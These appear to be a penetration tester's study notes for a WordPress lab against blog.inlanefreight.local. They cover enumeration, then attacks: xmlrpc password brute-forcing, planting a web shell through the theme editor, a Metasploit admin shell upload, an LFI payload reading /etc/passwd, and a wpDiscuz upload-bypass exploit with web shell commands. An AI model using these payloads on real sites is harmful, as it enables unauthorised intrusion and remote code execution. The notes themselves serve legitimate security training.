WordPress

Discovery & Enumeration
1. Discovery/Footprinting
  1. identify a WordPress site by going to /robots.txt file
    1. /wp-admin
      1. redirect us to the wp-login.php
    2. /wp-content/plugins
      1. enumerate vulnerable plugins
    3. /wp-content/themes
      1. enumerate vulnerable themes
2. Enumeration
  1. identify a WordPress site by looking at the page source
    1. cURL and grepping for WordPress
      1. curl -s http://blog.inlanefreight.local | grep WordPress
      2. grepping for the wp-content directory
      3. grep theme version number for any known vulnerabilities that affect it
      4. curl -s http://blog.inlanefreight.local/ | grep themes
      5. grep installed plugins &enumerating the versions
      6. curl -s http://blog.inlanefreight.local/ | grep plugins
      7. readme.txt to get version
    2. then footprint the version number
3. Enumerating Users
  1. default WordPress login
    1. /wp-login.php
      1. username enumeration
4. WPScan
  1. help menu
    1. wpscan -h
  2. pass an API token from WPVulnDB
    1. --api-token <token>
  3. enumerate plugins & themes & users
    1. --enumerate
  4. enumerate all plugins
    1. --enumerate ap
  5. full request
    1. sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token <token>
Attacking
1. Login Bruteforce
  1. WPScan
    1. wp-login (standerd login method)
    2. xmlrpc
      1. sudo wpscan --password-attack xmlrpc -t 20 -U <username> -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local
2. Code Execution
  1. modify the PHP source code to execute system commands
    1. manual
      1. Log in to WordPress with the credentials
      2. Click on Appearance on the side panel and select Theme Editor
      3. redirect us to the admin panel
      4. choose an alternate theme
      5. Click on Select after selecting the theme
      6. edit an uncommon page such as 404.php to add a web shell
      7. review code to find get param to execute code
      8. Click on Update File at the bottom to save
      9. interact with the web shell via the browser or using cURL (adding theme path we know befor)
      10. curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id
    2. using msf (must specify both the vhost and the IP address)
      1. use exploit/unix/webapp/wp_admin_shell_upload
      2. set rhosts <domain>
      3. set username <username>
      4. set password <password>
      5. set lhost <our_machine>
      6. set rhost <IP_target>
      7. set VHOST <vHost>
      8. show options
      9. exploit
      10. getuid
3. Vulnerable Plugins
  1. mail-masta
    1. suffered an unauthenticated SQL injection and a Local File Inclusion
      1. look at the vulnerable code for the plugin
      2. pl parameter allows us to include a file without any type of input validation or sanitization
      3. exploit this to retrieve the contents of the /etc/passwd file using cURL
      4. curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
  2. wpDiscuz
    1. it intended only to allow image attachments
    2. suffer from file upload bypass
      1. file mime type functions could be bypassed
      2. allowing an unauthenticated attacker to upload a malicious PHP file
      3. exploit script takes two parameters: -u the URL and -p the path to a valid post.
      4. python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1
      5. gain RCE
      6. use cURL to execute commands using the uploaded web shell
      7. curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id